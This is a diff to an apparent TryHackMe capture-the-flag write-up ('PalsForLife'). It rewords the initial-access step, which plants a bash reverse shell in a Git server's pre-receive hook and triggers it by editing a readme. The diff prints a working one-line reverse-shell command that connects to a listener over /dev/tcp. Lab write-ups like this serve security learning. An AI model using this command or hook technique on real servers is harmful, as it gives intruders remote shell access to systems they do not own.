F41zK4r1m/TryHackMe/PalsForLife.md

 ## Initial access:

-Since Leeroy is having the admin access on the Git instance, I was able to modify the GitHooks.
-Leveraging this situation I modified the pre-receive hook & added the bash reverse shell in it.
-I also started my netcat listener to listen for the reverse shell:
+Given Leeroy's administrative access on the Git instance, I exploited this privilege to modify the GitHooks.
+In this exploit, I inserted a bash reverse shell into the pre-receive hook and initiated a netcat listener to capture the reverse shell:

 ```bash
 bash -c 'bash -i >& /dev/tcp/10.6.79.71/53 0>&1'
 ```
 ![image](https://github.com/F41zK4r1m/TryHackMe/assets/87700008/fc7bdc7d-d053-4627-bda4-e01309a147eb)

-After updating the hook, I went back to the Leeroy readme.md & just added another "!" to update new changes, once I clicked on the update I got the reverse shell back to my listener, running as a user "git":
+After updating the hook, I navigated back to Leeroy's readme.md file and made a minor modification, adding an exclamation mark.
+Upon updating, the reverse shell connection was successfully established, running under the user "git":

 ![image](https://github.com/F41zK4r1m/TryHackMe/assets/87700008/c59a891b-fcb0-453e-b661-ea5416348f48)